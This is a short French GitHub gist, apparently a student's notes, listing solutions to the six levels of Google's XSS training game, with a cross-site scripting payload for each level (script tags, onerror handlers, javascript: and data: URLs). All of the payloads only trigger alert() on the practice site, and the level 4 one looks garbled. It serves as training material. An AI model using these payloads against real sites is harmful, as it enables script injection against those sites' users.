Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Quête Sécurité XSS 3.3 [Advanced] Attaques XSS : découvrir
level 1 : dans le formulaire <script>alert(1)</script>
level 2 : dans le formulaire on lui fait croire que c'est une image alors que non <img src="http://inexist.ent" onerror="javascript:alert(1)"/>
level 3 : dans l'url on echappe avec ' et on affiche une erreur https://xss-game.appspot.com/level3/frame#3' onerror='alert(1)';
level 4 : dans le formulaire 3'**alert());// car il execute directement le javascript et lance la fonction alert
level 5 : dans l'url https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1) + entrer son mail + next car dans next il executera la fonction alert
level 6 : dans l'url https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment